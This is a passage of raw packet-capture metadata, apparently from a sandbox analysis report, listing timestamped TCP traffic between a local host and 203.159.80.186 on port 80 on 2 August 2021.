                                Aug 2, 2021 10:59:54.487402916 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487422943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.487436056 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487443924 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.487462044 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487476110 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.487492085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487499952 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.487520933 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487530947 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.487551928 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.487560987 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:57.983104944 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:57.983143091 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:57.983181000 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:57.983211040 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:57.983227968 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:57.983247042 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:57.983254910 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:57.983295918 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:57.986325979 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010291100 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010337114 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010375977 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010410070 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010440111 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010471106 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010500908 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010529995 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010560036 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010590076 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010627985 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010662079 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010690928 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010720968 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010751009 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010780096 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010809898 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010838985 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010875940 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010909081 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010937929 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010968924 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.010998011 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.011025906 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.011055946 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.011085987 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.011141062 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.011221886 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012361050 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012393951 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012424946 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012442112 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012454987 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012478113 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012506008 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012546062 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012551069 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012583971 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012624979 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012630939 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012675047 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012712955 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012717962 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012752056 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012790918 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012793064 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012826920 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012865067 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012868881 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012902975 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012945890 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.012952089 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.012996912 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013035059 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013041019 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013075113 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013113022 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013123989 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013150930 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013189077 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013195038 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013227940 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013274908 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013278008 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013322115 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013359070 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013370037 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013400078 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013437986 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013442993 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013474941 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013514042 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013525009 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013552904 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013597965 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013602018 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013645887 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013681889 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013693094 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013721943 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013760090 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013772011 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013798952 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013837099 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013839960 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013875008 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013922930 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.013922930 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.013964891 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014003992 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014014006 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014043093 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014081955 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014087915 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014118910 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014158964 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014163017 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014198065 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014255047 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014256954 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014302969 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014339924 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014352083 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014389038 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014432907 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014439106 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014471054 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014509916 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014523983 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014548063 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014585972 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014604092 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014625072 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014663935 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014674902 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014713049 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014756918 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014769077 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014795065 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014833927 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014847040 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014873981 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014913082 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014924049 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.014952898 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.014991999 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.015007019 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.015041113 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.015084028 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.015089035 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041054010 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041080952 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041099072 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041111946 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041115046 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041124105 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041137934 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041151047 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041161060 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041168928 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041179895 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041182995 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041197062 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041201115 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041209936 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041224003 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041229963 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041245937 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041249990 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041331053 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041508913 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041527987 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041539907 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041558981 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041570902 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041572094 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041585922 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041603088 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041604042 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041615963 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041630030 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041640043 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041644096 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041659117 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041660070 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041671991 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041687965 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041690111 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041703939 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041719913 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041722059 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041735888 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041748047 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041754961 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041760921 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.041785002 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.041804075 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044315100 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044337034 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044356108 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044374943 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044389009 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044390917 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044408083 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044426918 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044428110 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044440985 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044457912 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044457912 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044476032 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044482946 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044493914 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044512987 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044523954 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044523954 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044537067 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044549942 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044559956 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044562101 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044574976 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044576883 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044588089 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044600964 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044609070 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044614077 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044626951 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044644117 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044646978 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044656992 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044666052 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044670105 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.044689894 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.044715881 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045613050 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045630932 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045646906 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045664072 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045680046 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045692921 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045692921 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045710087 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045713902 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045723915 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045738935 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045742035 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045762062 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045773029 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045774937 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045789003 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045804977 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045806885 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045816898 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045830965 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045845032 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045847893 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045865059 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045874119 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045882940 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045898914 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045911074 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045912027 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045924902 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045944929 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045944929 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045958996 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.045963049 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045975924 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.045993090 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046001911 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046005964 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046020031 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046036005 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046036005 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046050072 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046066999 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046070099 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046086073 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046087027 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046099901 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046118975 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046129942 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046135902 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046155930 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046164036 CEST4916680192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.046168089 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046181917 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046197891 CEST8049166203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.046202898 CEST4916680192.168.2.22203.159.80.186
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Aug 2, 2021 10:59:58.046211004 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046222925 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046238899 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046243906 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046255112 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046272039 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046283007 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046288013 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046305895 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046318054 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046319962 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046334982 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046349049 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046351910 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046365023 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046384096 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046386003 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046396971 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046410084 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046415091 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046422005 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046435118 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046447992 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046461105 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046462059 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046475887 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046480894 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046489000 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046502113 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046509981 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046514988 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046526909 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046535969 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046539068 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046551943 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046564102 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046565056 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046578884 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046586037 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046591997 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046605110 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046611071 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046617985 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046632051 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046637058 CEST | 49166 | 80 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 10:59:58.046646118 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 10:59:58.046658039 CEST | 80 | 49166 | 203.159.80.186 | 192.168.2.22
